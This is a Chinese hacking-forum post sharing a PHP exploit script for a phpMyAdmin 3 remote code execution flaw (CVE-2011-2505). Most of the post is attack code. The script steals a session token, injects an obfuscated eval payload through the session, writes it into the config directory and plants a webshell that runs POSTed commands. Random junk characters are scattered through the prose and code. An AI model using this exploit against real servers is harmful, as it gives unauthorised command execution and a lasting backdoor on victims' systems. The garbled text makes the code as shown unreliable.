中国网络渗透测试联盟

标题: phpadmin3 remote code execute php版本exploit [打印本页]
作者: admin    时间: 2013-2-21 09:13
标题: phpadmin3 remote code execute php版本exploit
最近在家做专职奶爸,不谙圈内事很多months了,博客也无更新。8 V- \3 e& h/ e+ X# f2 S) C
' O7 `; `) x2 \+ T8 E
昨夜带孩子整夜未眠,看到黑哥在php security群里关于phpmyadmin3漏洞的讨论,虽然之前没看过漏洞代码,不过前段时间还是在微博上看到wofeiwo的exp了,不过据黑哥说有不鸡肋的利用方法,于是夜里翻代码出来研究了翻,写出了这个冷饭exp,由于我搞的晚了,之前已经很多人研究了写exp了,于是我这个属于炒冷饭,权当研究研究打发时间了。, [8 R( ^+ }5 T4 \& g

1 C$ l; _- w4 J1 g  F' w  u首先赞下wofeiwo的python版本的exp,再赞下wofeiwo跟superhei的钻研精神,学习的榜样啊。不过之前那个exp利用起来是有一些限制的:* y( h5 K" S. `4 g
一是session.auto_start = 1;
) V. |  A, u  E: ?% ^6 H二是pma3默认代码里libraries目录已经用.htaccess控制了不允许访问。. M5 M* G, K( P1 n
当然还有第三点大家都不可以逾越的鸿沟:config目录存在且可写。
; ?, u6 _7 [0 K2 l6 k! V
% H" @$ p' H$ Z在群里看了黑哥的发言后,再看了下代码,发现前两点利用限制均可以无视。所以其实这个漏洞还真的可以不是那么鸡肋。
1 R6 D3 U& r. f: S2 B$ ]) w4 k9 E! r* m. g- @3 w
于是写了这个php版本的exp,代码如下:8 u! l7 P3 T& W/ w2 M, K5 F

% b  D* M3 b7 ^# L! y#!/usr/bin/php
+ p: f, k2 P* s+ A, r<?php3 @6 P% i7 U* u1 H# |$ U$ |
print_r('7 V$ C1 |% z7 K) I0 b4 |
+---------------------------------------------------------------------------+
9 ?3 Y5 _$ s2 C" V$ \: w0 zpma3 - phpMyAdmin3 remote code execute exploit [Not jilei(chicken\'s ribs)]
1 I9 h5 G1 O  P# i; d% M$ hby oldjun(www.oldjun.com)
6 |3 f& c) j5 bwelcome to www.t00ls.net
& z8 d. x9 u. l; }- imail: oldjun@gmail.com! ~" e7 _1 W5 H' Z. v& k
Assigned CVE id: CVE-2011-2505: u+ \3 j# E" M  V2 H7 ~
+---------------------------------------------------------------------------+( ?2 w% l1 {3 x
');  z) r; E, s9 e# r/ g
2 l+ P. L1 ?5 ^5 b0 m
/**
" P" W' K8 X* y3 X" i * working when the directory:"config" exists and is writeable.7 I" ]+ r( Q- l0 @# @7 d+ d  {
**/
% G, q. J" @  q- N0 _
) R: @9 a8 {8 y: Xif ($argc < 3) {/ D5 H' x" ]) i3 E) i- b
    print_r('8 i+ I/ A/ A& H! X. D' i
+---------------------------------------------------------------------------+. G: c+ e5 v8 F% H/ p; y: k& v
Usage: php '.$argv[0].' host path
+ G1 N2 X6 {7 q/ D& l8 xhost:      target server (ip/hostname)( E7 z/ b$ x2 o
path:      path to pma3; o; p# Y) K* o' @
Example:
4 b5 m1 M# i" l9 w1 ]php '.$argv[0].' localhost /pma/& p5 i" R9 L/ P5 q3 U3 ~* \1 o
+---------------------------------------------------------------------------+5 w- U1 A/ z3 f9 S6 ~
');. c6 i* L  A/ ~/ b: v& U
    exit;8 \% V: _' {3 R+ }1 N9 J$ Y
}
! |* \. Q5 U" j$ f# w, d( s  b8 E- A$ m  X$ ~* v
$host = $argv[1];8 c3 s9 r# u: A. Q
$path = $argv[2];/ C8 S& ^* F4 h" R- S9 h. V

' n4 J" u; W, j/**
& ?, Y" O+ s; ?" G/ J4 y7 F * Try to determine if the directory:"config" exists
) W# F. K/ K" Z' B6 G  E4 e**/
( r1 L0 ?) ]! z7 {. Wecho "[+] Try to determine if the directory:config exists....\n";9 v+ X0 `4 w5 j* b5 l- E" ?; _* A
$returnstr=php_request('config/');
- w) U# c8 U: v; N# M7 z2 _3 a( h# Nif(strpos($returnstr,'404')){
& d) q) f! w/ [0 A    exit("[-] Exploit Failed! The directory:config do not exists!\n");
7 l$ Y2 d2 y/ B  J8 P2 D}
8 Y4 n: w, m  k# t  s
% p. F3 f+ D$ X* G! c/**
" c' C: C& H# [- q * Try to get token and sessionid
! [: X5 j/ d7 P**/
* O8 O. ?2 e* s: ]echo "[+] Try to get token and sessionid....\n";& {+ u1 c- p& E. G- C
$result=php_request('index.php');  ~. c+ N' }* j1 |- S
preg_match('/phpMyAdmin=(\w{32,40})\;(.*?)token=(\w{32})\&/s', $result, $resp);0 C5 w) m9 U6 ]4 ]' E
$token=$resp[3];5 R8 W* `: _1 O- L$ N5 j0 q
$sessionid=$resp[1];
5 V& t8 r! L# {( [5 yif($token && $sessionid){/ ?0 H- G: A' u5 n$ i. v- q
    echo "[+] tokentoken\n";
$ ]4 n2 j; |+ t: v% J    echo "[+] Session IDsessionid\n";
) X2 S$ v& Y8 |. U* {}else{  w) x' E0 ?9 z) y# n1 X
    exit("[-] Can't get token and Session ID,Exploit Failed!\n");) g; \0 u  B. w% c- ^; V
}9 h- [* }0 x% }& C3 Q; O! N- x0 T  H
' @. r, B. ]. e" y$ e2 X& r
/**
4 w# s" j: s' i  _ * Try to insert shell into session* E7 A4 k6 b3 e  p5 e
**/
4 y7 _2 k- ?& a5 ^( Techo "[+] Try to insert shell into session....\n";0 v. W( e  `2 w% m& |- t: w
php_request('db_create.php?token='.$token.'&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59).chr(101).chr(99).chr(104).chr(111).chr(40).chr(39).chr(116).chr(48).chr(48).chr(108).chr(115).chr(39).chr(41).chr(59));/*][host]=t00ls.net','','phpMyAdmin='.$sessionid);//Actually,almost all the php files in home directory of pma3 can be used here.6 S6 e2 Z) @' }6 r+ G

* O& V9 `, J" v  @) v/**
& ]# C: v* t7 E$ c& t: j: P+ [6 s * Try to create webshell0 |7 e. O+ P6 k* d8 b$ V
**/
/ c0 a. ~' R0 z/ @5 [: M, u; j5 Eecho "[+] Try to create webshell....\n";' g( N7 ]4 O+ R: }* R
php_request('setup/config.php','phpMyAdmin='.$sessionid.'&tab_hash=&token='.$token.'&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save','phpMyAdmin='.$sessionid);6 g# _9 d$ H1 ~! C* E4 b1 k2 ?
/**
' A1 l  q% h2 i/ _3 S. w * Try to check if the webshell was created successfully
  C. t/ e; B. d$ G: z% S**/! l( d9 f$ _+ |% b6 Z+ q* X" r3 }$ m
echo "[+] Try to check if the webshell was created successfully....\n";
3 z$ r( M' {5 s! H$content=php_request('config/config.inc.php');
" O& U6 K( x& H+ [% uif(strpos($content,'t00ls')){: ^7 t0 T6 ]* T- I/ d
    echo "[+] Congratulations! Expoilt successfully....\n";
. \# w# ^# i/ K7 _( G1 c$ o- i    echo "[+] Webshell:http://$host{$path}config/a.php eval(\$_POST[cmd])\n";
5 t0 O& Y6 D" Q, F0 u& ]}else{
$ f( G: a/ m! M6 r1 r  q    exit("[-] Exploit Failed! Perhaps the directory:config do not exists or is not writeable!\n");$ v; l/ W2 q2 l7 E6 s. Z
}
- [* O$ D2 a. y. V6 K2 Y* M3 M
, o1 D. N0 P5 X/ r$ v0 \0 z# @/ Nfunction php_request($url,$data='',$cookie=''){6 W0 f7 T! r7 q" S6 H! \
    global  $host, $path;# W6 R# g3 R, h# O; F( I4 }
   
# Z% T, _- ~9 j' R0 P2 i, x6 b' k    $method=$data?'POST':'GET';
# O+ d* H9 K! |# Z    7 Q3 r8 ^+ O( v( B, u
    $packet = $method." ".$path.$url." HTTP/1.1\r\n";! K/ o" e, k# b4 T5 h
    $packet .= "Accept: */*\r\n";
; h% X9 j" o+ C4 q3 ]& h5 |    $packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";% |' _! ^& {& }+ i
    $packet .= "Host: $host\r\n";1 {) ^! c' T  O/ @
    $packet .= $data?"Content-Type: application/x-www-form-urlencoded\r\n":"";, Y, V) L5 `) w4 A3 i( A
    $packet .= $data?"Content-Length: ".strlen($data)."\r\n":"";2 ]2 n6 o7 X* u/ }: f- ^
    $packet .= $cookie?"Cookie: $cookie\r\n":"";* k) Q; ~  a# \6 S: P
    $packet .= "Connection: Close\r\n\r\n";
$ A& j. K- Y8 M    $packet .= $data?$data:"";
4 Y3 O0 G/ m- u9 N+ ~" v5 B$ l8 |: _5 \; w
    $fp = fsockopen(gethostbyname($host), 80);
1 ?2 D, P, _- g    if (!$fp) {
/ n& [* b, N5 m8 d    echo 'No response from '.$host; die;/ N- P8 T: W* p7 ^, U
    }
' c; D8 B. l. a0 h! P' h    fputs($fp, $packet);
: |! `/ z8 D4 E
, ]% V' s( W" L5 X1 i- X0 W' @    $resp = '';
$ h# E- |% S' O: [. E( h% G
6 q2 ?7 N( y( m' \; m5 q7 ^0 [    while ($fp && !feof($fp))& B! {! z! w: c/ |* X" T! x0 m
        $resp .= fread($fp, 1024);
- q9 h4 F! [( Q: {8 F( w0 B, S4 L/ l: Z) `8 D  M$ g
    return $resp;
1 n4 {7 s+ Z7 ]3 X, X}
+ @% C3 M; K% K  {5 Q    + P) K. j/ S0 x: t
?>
, r5 X  n  s3 r$ d1 N' r.



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2